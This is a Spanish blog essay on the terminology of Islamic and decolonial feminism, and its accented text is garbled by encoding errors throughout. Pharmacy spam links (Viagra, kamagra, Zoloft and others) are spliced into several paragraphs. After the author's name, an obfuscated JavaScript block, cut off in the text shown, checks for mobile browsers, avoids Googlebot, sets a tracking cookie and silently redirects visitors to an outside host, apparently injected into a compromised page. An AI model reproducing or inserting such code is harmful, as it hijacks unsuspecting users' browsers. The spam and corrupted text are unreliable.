Alkalima
Uncategorized

Feminismo islA?mico: terminologAi??a bA?sica

La cuestiA?n de la terminologAi??a es clave por varios motivos. Por una parte, es imprescindible para clarificar a quAi?? nos estamos refiriendo en cada caso, tratando de evitar posibles confusiones. Trata de dejar claras las implicaciones de cada tAi??rmino, especialmente de aquellos que a veces usamos de forma inconsciente, sin darnos cuenta de sus implicaciones (por ejemplo: Ai??feminismo occidentalAi??, Ai??feminismo laicoAi??…). A su vez, nos ayuda a diferenciar entre diferentes propuestas, facilitando la toma de partido individual y/o colectiva.

 

 

Por otro lado (y esto es tal vez mA?s importante), el conocer los diferentes tAi??rminos y sus implicaciones potenciales ayuda a situarse de forma autoconciente en relaciA?n al feminismo. El lenguaje puede ser un instrumento de dominaciA?n, pero tambiAi??n de liberaciA?n. Si uno no conoce las implicaciones del tAi??rmino corA?nico taqua, o del tAi??rmino japonAi??s satori, A?cA?mo podrA? aspirar a ello? Sin el concepto de justicia, no hay posibilidad de luchar por la justicia. Existen conceptos, acuAi??ados por importantes pensadores/as, que nos ayudan a conocer el mundo en que vivimos: sociedad disciplinaria, sociedad de control, estado de excepciA?n, biopoder, sociedad del espectA?culo… Sin conocer estos (u otros) conceptos y sus contenidos, uno puede llegar incluso a tragarse como cierta la ideologAi??a dominante: la pretensiA?n de que estamos en una sociedad democrA?tica en la cual se aplican los derechos humanos.

Las expresiones Ai??feminismo decolonialAi??, Ai??feminismo islA?micoAi?? o Ai??feminismo eurocAi??ntricoAi?? pueden ser pues entendidas como conceptos y no como meros enunciados de carA?cter descriptivo. Como conceptos, se constituyen en instrumentos que facilitan la territorializaciA?n y la clarificaciA?n de la propia posiciA?n en el mundo, en este caso, en relaciA?n a la cuestiA?n de gAi??nero, tanto a nivel local como global. Abren nuevas vAi??as y posibilidades de sentido, demostrando que no existe una A?nica opciA?n y que no es necesario plegarse a ningA?n discurso dominante (otro concepto A?til) para luchar contra el patriarcado.

Se comprende, pues, la resistencia de algunos sectores a tomar en consideraciA?n el planteamiento postcolonial, en la medida en que conduce al descrAi??dito de las pretensiones de hegemonAi??a del discurso feminista dominante elaborado en Occidente, el cual es denunciado como cA?mplice del colonialismo y, por tanto, de la opresiA?n de las mujeres del llamado Tercer Mundo. Por motivos similares, se comprende el rechazo a aceptar la posibilidad o tan solo la existencia de un Ai??feminismo islA?micoAi??, ya que estos constituyen un desafAi??o a las pretensiones de hegemonAi??a del discurso feminista antirreligioso.

Precisamente por eso, la cuestiA?n de la terminologAi??a no estA? cerrada, sino que es objeto de mA?ltiples discusiones. Este texto no pretende dar cuenta de dichas discusiones, sino clarificar el uso que nosotros hacemos de los tAi??rminos. MA?s allA? de la aceptaciA?n o no de este u aquel tAi??rmino, de lo que se trata es de adquirir una visiA?n sobre la problemA?tica que esta terminologAi??a nos revela.

 

A?QuAi?? es el feminismo?

El feminismo es un movimiento social, polAi??tico y cultural que busca eliminar las prA?cticas que fomentan la desigualdad, el elitismo y la dominaciA?n entre los gAi??neros. Denuncia las situaciones de opresiA?n o las discriminaciones contra las mujeres y lucha por su erradicaciA?n en todos los A?mbitos. Se propone recomponer las relaciones de gAi??nero desde una perspectiva igualitaria. Como proyecto polAi??tico y social, el feminismo se constituye como alternativa al patriarcado. Frente a esta doctrina, el feminismo postula la igualdad de gAi??nero, resaltando el hecho de que hombres y mujeres tienen a priori las mismas capacidades intelectuales y espirituales y el mismo derecho a desarrollar estas capacidades.

  • El patriarcado puede ser definido como el conglomerado de relaciones sociales, econA?micas e ideolA?gicas que se originan en la creencia en la inferioridad o en la subordinaciA?n de la mujer con respecto al hombre. Literalmente, la palabra patriarcado significa Ai??gobierno de los padresAi??. Se trata de la idea segA?n la cual una sociedad armA?nica es aquella en la cual el padre tiene autoridad sobre el resto de los miembros de la familia, una autoridad que se extiende tambiAi??n fuera del hogar. El discurso patriarcal sostiene que las capacidades de la mujer son limitadas con respecto al hombre y considera que, por sus caracterAi??sticas biolA?gicas concretas, la mujer ha sido dotada especAi??ficamente para la maternidad y los trabajos del hogar. El patriarcado no se presenta como lesivo para la dignidad o para la integridad de las mujeres, sino que, al contrario, se presenta como el marco ideal en el cual las mujeres estA?n perfectamente protegidas y pueden desarrollar su Ai??feminidadAi?? sin corromperse.
  • El tAi??rmino gAi??nero se refiere al conjunto de normas y prescripciones que cada sociedad establece sobre lo que es femenino y masculino. El patriarcado se basa en la idea de que existen cualidades tAi??picamente masculinas, opuestas a las cualidades tAi??picamente femeninas, y en la idea de que los hombres deben eliminar todo rasgo considerado femenino y las mujeres todo rasgo considerado masculino. La asunciA?n de los correspondientes roles sociales estA? supeditada a esta estricta separaciA?n entre lo masculino y lo femenino. El feminismo pone en evidencia que las diferencias entre los hombres y las mujeres, mA?s que biolA?gicas, son una construcciA?n social injusta. No existe un vAi??nculo necesario entre las diferencias biolA?gicas entre hombres y mujeres y sus capacidades intelectuales, humanas, espirituales, afectivas… La atribuciA?n de roles diferenciados al hombre y la mujer es un constructo histA?rico.
  • El tAi??rmino machismo alude a las actitudes, conductas, creencias y prA?cticas sociales mediante las cuales se perpetA?a la subordinaciA?n de las mujeres. El machismo estA? fuertemente arraigado en los comportamientos colectivos, especialmente en la familia tradicional. Se transmite y se perpetA?a en muchos casos de forma anA?nima e irreflexiva. Da por supuesta la subordinaciA?n de las mujeres y la separaciA?n de roles como algo Ai??naturalAi??. De ahAi?? que sea asociado con la prepotencia, una actitud de superioridad condescendiente con Ai??el otroAi??.
  • El tAi??rmino falocentrismo es usado para describir una doctrina o conducta androcAi??ntrica. El varA?n es el que tiene (el falo), y la mujer es pensada como un varA?n deficitario, en la medida en que carece de (falo). El varA?n es lo plenamente humano, el principio normativo. En la teorAi??a feminista, el concepto de falocentrismo ha sido muy A?til para descubrir las estrategias tAi??picamente patriarcales que se ocultan tras determinados discursos de apariencia feminista.
  • La lucha por la igualdad de derechos entre hombres y mujeres ha despertado la necesidad de replantearse la masculinidad en un sentido no machista. Se entiende por masculinidad un conjunto de atributos asociados al rol tradicional del hombre, como lAi??der activo y jefe de familia, que debe comportarse segA?n los atributos de la virilidad ideal: la fuerza, la valentAi??a, la virilidad, la competitividad, la seguridad en sAi?? mismo, el no mostrar afectividad, etc. Igual que sucede respecto a las mujeres, existe una gran presiA?n social para que los hombres se comporten segA?n estos atributos. Igual que el modelo de feminidad, el modelo de masculinidad dominante es un constructo cultural y puede ser modificado. No existe ninguna incompatibilidad entre los atributos tradicionalmente considerados como masculinos y los considerados como femeninos, sino que tanto los hombres como las mujeres pueden compartir atributos, valores y modelos de comportamiento. En este sentido, el feminismo implica una liberaciA?n no solo para las mujeres, sino tambiAi??n para los hombres.
  • El feminismo es pues, necesariamente, antijerA?rquico y democrA?tico. No pretende invertir sino eliminar la jerarquAi??a entre los sexos, sustituyAi??ndola por la armonAi??a entre iguales. De ahAi?? que el feminismo sea inseparable de valores como la solidaridad, la cooperaciA?n, la ayuda mutua. Y de ahAi?? que la teorAi??a feminista se adentre en los campos mA?s diversos y nos encontremos con un Ai??ecofeminismoAi??, un Ai??anarcofeminismoAi??, una economAi??a feminista (no depredadora, incluso no capitalista), etc. Existe la conciencia de que la igualdad de gAi??nero constituye una revoluciA?n en curso, con hondas implicaciones en todos los terrenos. En este sentido, muchas de las leyes elaboradas (aparentemente) en contra de la discriminaciA?n de las mujeres no son sino superficialmente feministas.

 

baclofen without prescription, buy Zoloft. Feminismo decolonial (o poscolonial)

Por Ai??giro decolonialAi?? entendemos la denuncia de la existencia de una Ai??episteme colonialAi??, el conjunto de ideas mediante las cuales la dominaciA?n colonial es justificada. En concreto, el proyecto ilustrado trazA? una dicotomAi??a entre un conocimiento pretendidamente universal (propio de Occidente) y las culturas y cosmovisiones Ai??otrasAi??, consideradas como locales, parciales y, por tanto, defectuosas con respecto al primero. La autodefiniciA?n de Occidente como moderno, racional, democrA?tico, evolucionado y feminista es inseparable de la definiciA?n del no occidental como tradicional, mA?gico, despA?tico, atrasado y machista. http://afembud.com/costo-de-lopid-600-mg/ http://proyectodia.com.mx/?p=5620

Esta consideraciA?n afecta a la propia distinciA?n epistemolA?gica y ontolA?gica entre Oriente y Occidente, en la cual Occidente es el referente hegemA?nico a partir del cual Oriente es definido. Oriente pasa a ser Ai??el otroAi?? subordinado. El oriental pasa a ser considerado como un Ai??sujeto subalternoAi??, incapaz de conocerse, de representarse o de gobernarse a sAi?? mismo. En contraste, el Ai??sujeto occidentalAi?? queda autodefinido como moderno y civilizado, autosituado a la vanguardia del progreso de la humanidad. Toda posible emancipaciA?n (en cualquier nivel) pasarAi??a por adoptar este paradigma. El sujeto oriental liberado es un sujeto occidentalizado.

El giro decolonial afecta de forma directa al feminismo. Pone en evidencia que existe un discurso feminista que repite el modelo falocrA?tico, en la medida en que impone un modelo feminista hegemA?nico. El anA?lisis de los textos, de las prA?cticas y de los discursos pone en evidencia hasta quAi?? punto el feminismo eurocAi??ntrico estA? al servicio del imperialismo, repitiendo un modelo orientalista. El universalismo etnocAi??ntrico feminista tiende a juzgar las estructuras econA?micas, legales, familiares y religiosas tomando como referencia los estA?ndares occidentales.

  • El giro decolonial implica una crAi??tica a la razA?n ilustrada, caracterizada como episteme colonial. La IlustraciA?n dotA? al orientalismo de todo el aparato ideolA?gico y conceptual necesario. Nos hallamos ante la producciA?n discursiva de palabras como tradicional, moderno, progreso, primitivo… y la creaciA?n de una serie de dualidades que serA?n proyectadas desde la Europa al resto de pueblos de la tierra: modernidad-tradiciA?n; progreso-atraso; universalismo-nativismo…
  • El giro decolonial conduce, inevitablemente, a plantear un Ai??feminismo postorientalistaAi??. Se trata de superar una visiA?n de Oriente y sus culturas definidas desde el sujeto occidental, deconstruyendo las pretensiones de normatividad del sujeto occidental (incluido el feminismo eurocAi??ntrico).
  • El feminismo poscolonial pasa por una crAi??tica al esencialismo kamagra 100 mg tablets in europe . La fijaciA?n de categorAi??as como Ai??la mujer orientalAi??, Ai??la mujer chicanaAi??, Ai??la mujer del tercer mundoAi?? implica una reducciA?n a un mAi??nimo comA?n esencial de la complejidad y de la diversidad de situaciones que viven las mujeres clasificadas mediante dichas etiquetas. La consideraciA?n de que existe algo asAi?? como Ai??la mujer orientalAi?? supone que las mujeres que viven en Oriente estA?n presas de unos modelos y comportamientos que las definen objetivamente y de los cuales no pueden escapar. El esencialismo implica, entonces, la negaciA?n de la capacidad de las mujeres concretas de cambiar su situaciA?n. Las hace dependientes de la acciA?n liberadora del sujeto colonial. Debe tenerse sin embargo presente que existe una diferencia clave entre una identidad definida desde dentro y la definiciA?n esencialista fijada desde fuera: existe, pues, un debate en este punto.
  • Todo esto nos ayuda a comprender cuA?l es el papel otorgado a Ai??la mujer musulmanaAi?? en el discurso colonial. Como estereotipo, es un no hombre, no cristiano, no blanco, no occidental y no ilustrado. Es, por lo tanto, una suma de carencias, el sujeto subalterno por antonomasia, incapacitada para hablar por sAi?? misma, objeto de mA?ltiples discursos y dominios. De ahAi?? la resistencia por parte del feminismo eurocAi??ntrico a aceptar la propia posibilidad de un feminismo dentro del islam.
  • Algunos pretenden establecer una distinciA?n entre decolonial y poscolonial, sobre la base de que el primer tAi??rmino surgirAi??a en la AmAi??rica Latina y el otro en el mundo anglosajA?n… Por nuestra parte, no creemos A?til esta distinciA?n. BA?sicamente, porque dichas fronteras son arenas movedizas, que tienen un sentido mA?s acadAi??mico que real.

 

 

A?Feminismo occidental?

Consideramos incorrecto hablar de un Ai??feminismo occidentalAi?? (como en la cita anterior de Meyda Yegenoglu). Primero, porque presupone que solo hay un modelo de feminismo en Occidente, con lo cual niega tanto la diversidad interna como la posibilidad de cambio. Es, en este sentido, un calificativo esencialista. Segundo, porque establece una frontera geogrA?fica entre lo que no son territorios: estas fronteras son mA?s mentales que reales. Se basan en una pervivencia de un concepto territorializado de la religiA?n (cristiandad frente a mundo islA?mico). E ignoran que hay mujeres musulmanas o del tercer mundo en todos los paAi??ses llamados occidentales.

Otros tAi??rminos A?tiles (o inA?tiles):

  • Proponemos usar el tAi??rmino Ai??feminismo eurocAi??ntricoAi?? para definir aquellas actitudes que se reivindican feministas y que consideran que el feminismo es algo Ai??propio de OccidenteAi??, exigiendo, de modo implAi??cito, la adopciA?n de un canon y unos modelos sociales determinados a todas las mujeres del mundo, con independencia de su clase, raza o religiA?n. TambiAi??n es A?til el concepto Ai??feminismo colonialAi??, ya que pone en evidencia la contradicciA?n interna de dicho (pretendido) feminismo.
  • Proponemos los tAi??rminos Ai??feminismo oficialAi?? y Ai??feminismo de EstadoAi?? para calificar el Ai??feminismoAi?? que se predica desde el Estado y se propaga desde los que Althuser calificaba como Ai??aparatos ideolA?gicos del EstadoAi??.
  • El tAi??rmino Ai??feminismo ateoAi?? no serAi??a apropiado, pues se puede ser ateo y defender el derecho de los creyentes a vivir, pensar o actuar desde una dimensiA?n espiritual y/o Ai??religiosaAi??.
  • Proponemos aparcar el tAi??rmino Ai??feminismo secularAi??, pues resulta confuso, en la medida en que desplaza la lucha por la justicia de gAi??nero de su propio centro, condicionA?ndola al debate sobre el secularismo. No deja de ser un enunciado eurocAi??ntrico, pues sitA?a la problemA?tica feminista en el terreno de las relaciones Estado-Iglesia, en una dinA?mica caracterAi??stica de la historia de Occidente. SAi?? consideramos apropiada la expresiA?n Ai??feminismo secularista eurocAi??ntricoAi??, en la medida en que alude a la (posible) conexiA?n entre eurocentrismo y el secularismo.

 

Feminismo del Tercer Mundo

El tAi??rmino Ai??feminismo del Tercer MundoAi?? tiene su origen en la geopolAi??tica internacional. Aunque en este caso la aceptaciA?n de la existencia de un Ai??tercer mundoAi?? diferenciado de un Ai??primer mundoAi?? es eminentemente crAi??tica: sirve para poner en evidencia el abismo econA?mico entre un mundo capitalista dominante y una periferia dominada. Apunta por ello a poner en el centro dicha diferencia a la hora de considerar el feminismo. En este sentido, el feminismo del Tercer Mundo pone el Ai??nfasis en las desigualdades sociales y en la cuestiA?n racial, no consideradas o descartadas como irrelevantes por el feminismo oficial dominante en occidente (el Ai??feminismoAi?? que se predica desde el Estado y que Althuser calificaba como los Ai??aparatos ideolA?gicos del EstadoAi??).

Se trata de situar las problemA?ticas de clase social y de raza en el centro del discurso feminista, considerando que estas han sido obviadas de manera negligente (cuando no directamente calculada) por el feminismo eurocAi??ntrico. Un inmenso nA?mero de mujeres en el mundo sufren discriminaciones raciales, sociales o religiosas, sin olvidar la persistencia del colonialismo, tanto a nivel econA?mico como cultural. Considerado como proyecto emancipador, el feminismo no puede desinteresarse por estas discriminaciones sin caer en la contradicciA?n interna. No se puede utilizar el tAi??rmino Ai??mujeresAi?? como una categorAi??a estable de anA?lisis, que presupone una unidad ahistA?rica y universal, lo que acentA?a sA?lo la identidad genAi??rica y deja de lado la clase social y las identidades Ai??tnicas.

  • Todo conduce a una redefiniciA?n del patriarcado, no basada de forma exclusiva en la cuestiA?n de gAi??nero. Se toma conciencia de que el racismo, el militarismo, el totalitarismo, el imperialismo y el capitalismo son empresas tAi??picamente patriarcales.
  • En A?ltima instancia, este proceso de apertura y de redefiniciA?n del feminismo pone en evidencia la imposibilidad de un feminismo no decolonial y no capitalista. En el contexto de la globalizaciA?n corporativa, un Ai??feminismoAi?? que no ponga en primer plano las opresiones econA?micas que sufren la inmensa mayorAi??a de las mujeres en el mundo no es sino un instrumento mA?s de la dominaciA?n global. SerAi??a, en A?ltimo tAi??rmino, un feminismo patriarcal o, como mAi??nimo, subsidiario de estrategias tAi??picamente patriarcales (se puede mencionar como paradigmA?tica la figura de John Stuart Mill, como icono al mismo tiempo del feminismo eurocAi??ntrico y del neoliberalismo).

 

Feminismo islA?mico

El feminismo islA?mico es un movimiento de reivindicaciA?n de la justicia de gAi??nero dentro de un paradigma islA?mico. MA?s que una definiciA?n, lo que proponemos aquAi?? es una visiA?n de conjunto, que tenga en cuenta las diferentes dimensiones e implicaciones del feminismo islA?mico en tanto que movimiento, mA?s allA? de la diversidad de sus manifestaciones:

purchase minocin medication

  • Se trata de un movimiento centrado en el CorA?n, que propone una exAi??gesis igualitaria, desde la conciencia de que histA?ricamente el CorA?n ha sido leAi??do en clave patriarcal.
  • Forma parte del feminismo global y, mA?s concretamente, de los feminismos decoloniales, que contestan las pretensiones de supremacAi??a del feminismo eurocAi??ntrico, denunciando el racismo implAi??cito en muchos de sus planteamientos.
  • Tiene una dimensiA?n histA?rica: tiene su origen en las necesidades internas de las sociedades musulmanas y sus antecedentes en la historia del islam.
  • SociolA?gicamente hablando, el FI es hijo del islam polAi??tico, como parte de los movimientos que se vienen desarrollando en el mundo islA?mico tras el fracaso de la utopAi??a polAi??tica islamista.
  • PolAi??ticamente, es un movimiento de contestaciA?n a la alianza entre el fundamentalismo religioso y la globalizaciA?n corporativa (los dos grandes enemigos de los derechos de las mujeres en el mundo).
  • En el terreno jurAi??dico: su campo de batalla por excelencia es la reforma de los cA?digos de familia patriarcales, vigentes en muchos paAi??ses de mayorAi??a musulmana.
  • acquistare viagra in parafarmacia

  • Tiene una dimensiA?n espiritual, y se presenta como una posibilidad de vivificaciA?n espiritual de la ummah y del feminismo global al mismo tiempo.

Si el feminismo decolonial o del Tercer Mundo habAi??a mostrado la necesidad de poner en primer plano los temas sociales y raciales, el feminismo islA?mico pone en evidencia la importancia de la cuestiA?n religiosa. De hecho, el modelo falocAi??ntrico perpetuado por el feminismo colonial eurocAi??ntrico no es sino una variaciA?n del modelo Ai??eclesiocAi??ntricoAi??, incluso Ai??cristocAi??ntricoAi??. Humanismo ilustrado, Ai??cristocentrismoAi??, orientalismo, patriarcado: todos ellos repiten la misma operaciA?n: construir un modelo de universalidad normativa ante el cual deben medirse los modelos Ai??otrosAi??. En este sentido, la existencia del feminismo islA?mico implica una apertura y una deconstrucciA?n radical de las pretensiones de hegemonAi??a del feminismo eurocAi??ntrico, llevA?ndola mA?s allA? de las cuestiones (por otra parte cruciales) de la raza y de la clase social.

 

Otros tAi??rminos A?tiles (o inA?tiles):

mail order colchicine

  • LingA?Ai??sticamente hablando, no existe una diferencia entre Ai??feminismo islA?micoAi?? o Ai??feminismo musulmA?nAi??. Si nos remitimos a la Real Academia de la Lengua, la palabra islA?mico es un adjetivo que significa: Ai??Perteneciente o relativo al islamAi??. La palabra musulmA?n tendrAi??a dos acepciones: Ai??Que profesa la religiA?n de MahomaAi?? y Ai??Perteneciente o relativo a Mahoma o a su religiA?nAi??. AA?n asAi??, existe un debate sobre cuA?l de los dos tAi??rminos es mA?s apropiado, e incluso el tAi??rmino Ai??feminismo musulmA?nAi?? es a menudo utilizado para referirse al feminismo A?rabe musulmA?n.
  • Por feminismo A?rabe o A?rabe musulmA?n, se entiende el feminismo que reivindica su especificidad en la cultura A?rabe, lo cual puede incluir el reconocimiento del islam como parte de dicha identidad. La diferencia con el feminismo islA?mico estribarAi??a en que este A?ltimo encuentra en el islam su fundamento, mientras el feminismo A?rabe musulmA?n no busca establecer su legitimidad en un discurso religioso.
  • El feminismo A?rabe suele ser considerado como una manifestaciA?n del feminismo nacionalista, en la medida en que sitA?a la identidad cultural y/o nacional como centro a partir del cual se territorializa su discurso. Diversas autoras han mostrado cA?mo el feminismo no era una ideologAi??a extranjera impuesta a los paAi??ses del Tercer Mundo, sino cA?mo las mujeres indAi??genas lucharon por la igualdad de derechos y contra la subordinaciA?n de la mujer al hombre. Desde la perspectiva poscolonial, se acusa a los movimientos nacionalistas de perpetuar un modelo de Estado-naciA?n heredado del imperialismo occidental.
  • Otro tAi??rmino polAi??mico es el de feminismo modernista, utilizado para referirse a los movimientos que vinculan la emancipaciA?n de la mujer a la asunciA?n de los ideales proclamados por la modernidad occidental. A pesar de los claros avances que los proyectos modernizadores significaron para las mujeres, han sido a menudo denunciados como cA?mplices de polAi??ticas de ingenierAi??a social llevadas a cabo desde el Estado patriarcal y autoritario (el caso del kemalismo turco es prototAi??pico).

 

Feminismo transnacional/global

El poner apellidos al feminismo no conduce a la segregaciA?n ni al enfrentamiento necesario entre diferentes feminismos. Tiene su origen en la necesidad de contextualizar la lucha por la igualdad de gAi??nero, de cara a responder de forma eficaz a situaciones muy diversas. En la medida en que el feminismo se enraAi??za en la vida real de las mujeres, el feminismo debe tomar en consideraciA?n la situaciA?n histA?rica concreta en la que viven, si no quiere devenir mera ideologAi??a.

El concepto de Ai??feminismo globalAi?? propone una visiA?n global, de conjunto, basada en las solidaridades que puedan (o deban) establecerse entre los diferentes movimientos feministas, sin menoscabo de su autonomAi??a. En este sentido, el feminismo global es un Ai??feminismo transnacionalAi??.

 

Feminismo, A?con o sin apellidos?

Desde sus orAi??genes, el feminismo ha sido un movimiento muy diverso. Esta diversidad no hace sino aumentar cuando es considerado desde una perspectiva decolonial. Como conjunto de teorAi??as sociales y prA?cticas polAi??ticas, se habla de feminismo de la diferencia, de un feminismo cultural, de un feminismo radical, de un Ai??ecofeminismoAi??, de un feminismo marxista… Esta diversidad es vista, en ocasiones, como problemA?tica. Se acusa a menudo a los diferentes feminismos de Ai??poner apellidosAi?? al feminismo, estableciendo asAi?? diferencias en una lucha que (por su naturaleza) deberAi??a plantearse como universal.

En relaciA?n a los feminismos del Tercer Mundo, esta crAi??tica ignora la situaciA?n dada: la existencia de un feminismo eurocAi??ntrico dominante, que se autoproclama como feminismo originario, pretendiendo que el feminismo se origina en Occidente. En este sentido, mediante la aceptaciA?n acrAi??tica del Ai??Feminismo (sin apellidos)Ai??, corremos el peligro de validar la existencia de un principio normativo feminista, frente al cual el resto de feminismos deben ser considerados. La idea de que existe un A?nico feminismo es, ademA?s, esencialista. Constituye una deriva del feminismo en cuanto a praxis a poner el acento en el feminismo en tanto que ideologAi??a. Se trata de un giro logocAi??ntrico. Nos situamos ante la imposiciA?n de un discurso feminista autoconsiderado como central, alrededor del cual se establecen los Ai??otrosAi?? feminismos. Se repite la estrategia discursiva que pretende que Ai??los valores de OccidenteAi?? (tal y como son definidos por el poder) son Ai??universalesAi??, mientras los valores de otros lugares, cosmovisiones o culturas son locales.

Se ha incluso argumentado que el propio concepto de universalidad esta ligado tanto al patriarcado como al colonialismo. Establece una dialAi??ctica centro-periferia, normatividad-alteridad, tAi??picamente falocAi??ntrica. Muchas de las que defienden un Ai??feminismo sin apellidosAi?? no nos dicen que son ateas, o marxistas, o que no se oponen al capitalismo, e incluso defienden el colonialismo (las nuevas guerras imperiales). En esos casos, se tratarAi??a de un Ai??feminismo ateoAi??, o de un feminismo marxista, o de un feminismo capitalista y militarista, que se escudarAi??an en la pretensiA?n de universalidad para ocultar sus agendas polAi??ticas o ideolA?gicas.

Se considera normal que una feminista del Caribe no pretenda que el modo en que concibe su lucha por la emancipaciA?n es universal. En cambio, se considera aceptable que una feminista atea occidental considere su concepciA?n del feminismo como universal. Se considera a sAi?? misma como paradigma de la mujer liberada, llegando en ocasiones a exigir a las mujeres del resto del mundo que adopten su lenguaje, sus estrategias y prioridades. En el fondo, el poner apellidos al feminismo no es sino una cuestiA?n de honestidad: el reconocimiento del contexto en el cual se desarrolla cada lucha, lo cual implica el reconocimiento de que existen contextos diferentes y, por tanto, diversas prioridades y estrategias o modos de concebir el feminismo.

La proliferaciA?n de feminismos tiene que ver, pues, con la primacAi??a de la praxis sobre la teorAi??a. En la medida en que se respetan y comparten objetivos bA?sicos, los diferentes feminismos se entienden entre sAi??, establecen vAi??nculos y demuestran que es posible (imprescindible) colaborar desde diferentes paradigmas. Esta colaboraciA?n queda rota en el momento en que un feminismo se considera como normativo, tratando de supeditar al resto a sus criterios.

 

 

 

Abdennur Prado

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt 